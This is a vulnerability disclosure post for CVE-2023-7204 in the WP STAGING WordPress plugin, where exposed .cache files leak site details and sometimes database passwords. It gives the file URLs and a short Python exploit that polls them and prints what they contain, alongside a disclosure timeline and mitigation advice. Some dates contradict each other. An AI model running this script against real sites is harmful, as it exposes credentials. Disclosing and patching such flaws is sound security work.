In a recent examination of the WP-STAGING plugin, a highly critical vulnerability was uncovered, posing an existential threat to the security of WordPress installations. This flaw resides in the directory /wordpress/wp-content/uploads/wp-staging/ and exposes not only intricate details about the site’s architecture, configurations, and file structures but, more alarmingly, leaks the database password in certain instances. This revelation marks a significant security breach with far-reaching consequences.
Main info:
| CVE | CVE-2023-7204 |
| Plugin | WP STAGING WordPress Backup Plugin โ Migration Backup Restore < 3.2.0 |
| Critical | Super High |
| All Time | 2 868 943 |
| Active installations | 80 000+ |
| Publicly Published | January 8, 2023 |
| Last Updated | January 8, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | Yes |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7204 https://wpscan.com/vulnerability/65a8cf83-d6cc-4d4c-a482-288a83a69879/ |
| Plugin Security Certification by CleanTalk |  |
Timeline
| December 18, 2023 | Plugin testing and vulnerability detection in the WP-STAGING have been completed |
| December 18, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 25, 2023 | The author fixed the vulnerability and released the plugin update |
| January 8, 2023 | Registered CVE-2023-7204 |
Discovery of the Vulnerability
A severe vulnerability has been discovered in the directory /wordpress/wp-content/uploads/wp-staging/. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database password (in some cases). Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.
Understanding of Sensitive Data Exposure attack’s
Sensitive Data Exposure involves the unintentional disclosure of confidential information. In the case of WordPress, this could encompass database credentials, configuration files, or other critical data. Real-world examples of such exposure might include inadvertently revealing database passwords, allowing unauthorized users to access sensitive backend information.
Exploiting the Sensitive Data Exposure Vulnerability
Exploiting this vulnerability involves unauthorized users gaining access to sensitive information, particularly database passwords. Armed with this data, attackers can launch various attacks, including brute force attempts on password hashes, potentially leading to a full compromise of the system.
POC:
1) The plugin has the ability staging of site. When some admin will start this process attacker can capture .cache file
2) There is a lot of sensitive data (paths (another backups included), DB_name, DB_tables, DB_columns and etc) and most importantly, you can take database password if user use PRO version of the plugin and migrate him site to another database
“http://your_site/wordpress/wp-content/uploads/wp-staging/clone_options.cache”,
“http://your_site/wordpress/wp-content/uploads/wp-staging/files_to_copy.cache”
EXPLOIT (python3):
import requests import time import threading urls = [ "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/clone_options.cache", "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/files_to_copy.cache" ] print("The following links are checked:") for url in urls: print(url) def check_url(url): while True: try: response = requests.get(url) if response.status_code == 200: print(f"File at {url} found! I display the contents...") print(response.text) except requests.RequestException as e: print(f"Error when requesting to {url}: {e}") time.sleep(1) for url in urls: thread = threading.Thread(target=check_url, args=(url,)) thread.start()___
The potential risks associated with this vulnerability are severe and multifaceted. In real-world scenarios, attackers could:
- Initiate brute force attacks on leaked database passwords.
- Gain unauthorized access to sensitive configurations.
- Compromise the integrity and confidentiality of the entire WordPress system.
This vulnerability not only jeopardizes the immediate security of the affected WordPress site but could also lead to broader consequences if the compromised data is used maliciously.
Recommendations for Improved Security
- Immediate Patching: Developers should release an urgent patch or update that addresses this specific vulnerability.
- Password Rotation: Database passwords should be promptly rotated to nullify the leaked credentials.
- Monitoring and Logging: Implement robust monitoring and logging mechanisms to detect and respond to suspicious activities.
- Educate and Alert Users: Inform WordPress administrators and users about the urgency of the situation and the need to update the plugin immediately.
- Third-Party Security Audits: Consider third-party security audits to identify and rectify any other potential vulnerabilities in the WordPress setup.
By adopting these measures, WordPress administrators can mitigate the immediate risks and fortify their systems against potential exploitation, ensuring the security and confidentiality of their sensitive data.
#WordPressSecurity #SensitiveDataExposure #WebsiteSafety #StayProtected #SuperHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
